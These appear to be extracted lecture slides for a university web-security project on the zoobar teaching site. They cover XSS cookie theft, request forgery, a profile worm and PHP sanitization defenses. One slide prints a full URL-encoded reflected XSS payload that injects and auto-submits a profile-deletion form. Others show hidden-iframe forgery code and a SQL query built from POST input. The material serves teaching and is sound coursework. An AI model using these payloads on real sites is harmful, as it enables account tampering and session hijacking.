4 A: Cookie Theft Use URL encoding Could hijack session C: Password Theft Evade sanitization Handle DOM events email Attacks B: Request Forgery Navigate browser Use iframes, forms D: Profile Worm Persistent attack Replicates zoobar.org link email zoobar.org form badguy.com stanford.edu redirect badguy.com zoobar.org form zoobar.org
5 Sanitization Works differently depending on context Attack: Break out with ' " Defense: escape quotes with \ attackstring Attack: Launch script with Attack: Close off parent tag Defense: escape angle brackets eval( attackstring ) Attack: Do whatever you want Defense: Don’t do that
6 Example: Profile Deleter Malicious hyperlink deletes profile of user who clicks it Only works when user logged in User might have multiple tabs open Might have chosen/forgotten not to log out Might appear in another user’s profile Uses vulnerability in users.php from Attack A Constructs profile deletion form and submits it ???
7 Find vulnerability Site reflects query parameter in input field Link can include anything we want here
8 Copy form data View source to find form fields Create copycat form with our modifications
9 Close previous, Button click triggers form submit URL encode http://scriptasylum.com/tutorials/encdec/encode-decode.html http://www.dommermuth-1.com/protosite/experiments/encode/index.html
12 Profile deleted Final Test users.php replaced with index.php http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform %0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C% 2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22 Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28 %29%3C%2Fscript%3E
13 Post form into hidden iframe … Open page with form in hidden iframe … document.myframe.contentDocument.forms.profile_update.value =“”; Stealthier approaches
15 Goals Learn: How easy it is to make mistakes That even simple code can be hard to secure Techniques for appropriate input validation PHP Very basic SQL Little programming knowledge can be a dangerous thing
16 File structure index.php users.php transfer.php login.php includes/ auth.php (cookie authentication) common.php (includes everything else) navigation.php (site template) db/ zoobar/ Person.txt (must be writable by web server) Includes /usr/class/cs155/projects/pp2/txt-db-api/… Only edit these files
17 txt-db-api Third-party text file database library Data can be int, string, and autoincrement Need to escape strings: \' \" \\ Actually magic_quotes_gpc does this for us $recipient = $_POST[‘recipient’]; // already escaped $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'"; $rs = $db->executeQuery($sql); if( $rs->next() ) $id = $rs->getCurrentValueByName(‘PersonID’);
18 A: Cookie Theft C: Password Theft Defenses to Part 1 B: Request Forgery Attack D: Profile Worm
19 PHP Sanitization Techniques addslashes(string) Prepends backslash to ' " \ Already done by magic_quotes_gpc Inverse: stripslashes(string) htmlspecialchars(string [, quote_style]) Converts & " to HTML entities Use ENT_QUOTES to change ' to ' strip_tags(string, [, allowable_tags]) Max tag length 1024 Does not sanitize tag properties preg_replace(pattern, replacement, subject) More info: http://php.net
20 More XSS hunting Look for untrusted input used as output Note sanitization already applied to each variable Form data has magic_quotes_gpc, db data does not Sanitize the output if necessary No penalty for erring on the side of caution But sanitizing multiple times may lead to problems No credit for solving non-goals: SQL injection, etc.